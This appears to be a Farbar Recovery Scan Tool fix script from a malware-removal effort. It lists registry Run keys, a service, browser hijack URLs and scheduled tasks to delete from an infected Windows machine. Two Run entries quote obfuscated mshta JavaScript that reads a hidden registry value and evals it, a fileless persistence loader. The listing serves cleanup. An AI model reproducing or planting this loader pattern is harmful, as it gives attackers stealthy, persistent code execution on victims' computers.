CreateRestorePoint:
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [WindApp] => "C:\Users\PimpSlap\AppData\Roaming\Store\WindApp\WindApp.exe" /winstartup
C:\Users\PimpSlap\AppData\Roaming\Store\WindApp
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Selection Tools] => "C:\Users\PimpSlap\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe" /winstartup
C:\Users\PimpSlap\AppData\Roaming\WTools
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**bfa63c00<*>] => mshta javascript:tg5Av9BK="F7FU0VZ6tm";Q2k=new%20ActiveXObject("WScript.Shell");TvtxAYj0="5EsUzy";nTa5r6=Q2k.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");MLUFn3l="dr9X";eval(nTa5r6);sKu0ZwI="RwVzRS (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**10548e12<*>] => mshta javascript:aRV1SL8ci="1Vhox";U1z3=new%20ActiveXObject("WScript.Shell");Kc5EZWrY="10ceYvbH";O4eIG=U1z3.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");pN6ujpZ6iw="cw";eval(O4eIG);jrwYec53i="SGxNZ (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
FF Homepage: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF Extension: No Name - C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\extensions\6a1a03975fde4c8690f6b883c36bc1@7d88519bfe704d8cae3851239.com [not found]
S2 NetTcpHandler; C:\Users\PimpSlap\AppData\Roaming\NetService\netservice.exe -start [X]
C:\Users\PimpSlap\AppData\Roaming\NetService
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{5F63E8CB-8F57-490A-97FE-62BC2F2A5EA4}\InprocServer32 -> no filepath
Task: {31718128-098F-4BB9-BAE0-DE20FCC657AB} - System32\Tasks\Installer_smknnodesk => C:\Users\PimpSlap\AppData\Local\Installer\Installsmknnodesk_32556\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {A91E6011-C8AE-4509-9EE9-6DB4B2051670} - System32\Tasks\Installer_DSKB => C:\Users\PimpSlap\AppData\Local\Installer\InstallDSKB_27758\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {D42682DB-910D-46BF-950F-584A6578B3A2} - System32\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
EmptyTemp: